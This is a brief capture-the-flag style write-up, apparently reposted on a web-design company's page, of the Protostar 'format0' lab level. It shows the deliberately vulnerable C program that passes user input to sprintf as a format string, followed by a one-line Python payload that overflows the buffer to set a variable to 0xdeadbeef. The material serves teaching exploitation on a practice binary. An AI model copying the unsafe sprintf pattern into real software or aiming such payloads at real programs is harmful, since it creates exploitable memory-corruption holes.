Protostarformat0

About

This level introduces format strings, and how attacker supplied format strings can modify the execution flow of programs.
Hints:
  • This level should be done in less than 10 bytes of input.
  • "Exploiting format string vulnerabilities"
This level is at /opt/protostar/bin/format0
#include #include #include #include
void vuln(char *string)
{
volatile int target;
char buffer[64];

target = 0;

sprintf(buffer, string);

if(target == 0xdeadbeef) {
    printf("you have hit the target correctly :)\n");
}
}

int main(int argc, char **argv)
{
vuln(argv[1]);
}

格式化字符串热身题,只需要将target部分覆盖也\xdeadbeef即可。因为在定义时,target和buffer是连着的,因此在内存的位置也是一起的。故可得:

user@protostar:/opt/protostar/bin$ ./format0 $(python -c 'print "a"*64+"\xef\xbe\xad\xde"')
you have hit the target correctly :)


新闻名称:Protostarformat0
分享路径:http://hxwzsj.com/article/jihsdd.html

其他资讯

Copyright © 2025 青羊区翔捷宏鑫字牌设计制作工作室(个体工商户) All Rights Reserved 蜀ICP备2025123194号-14
友情链接: 外贸网站建设 盐亭网站设计 成都营销网站制作 成都网站建设 网站制作公司 成都网站设计 企业手机网站建设 成都企业网站设计 手机网站建设套餐 营销型网站建设 商城网站建设 LED网站设计方案 广安网站设计 手机网站制作设计 四川成都网站建设 成都网站制作 高端网站设计 成都网站设计公司 网站制作 定制网站设计 成都响应式网站建设公司 泸州网站建设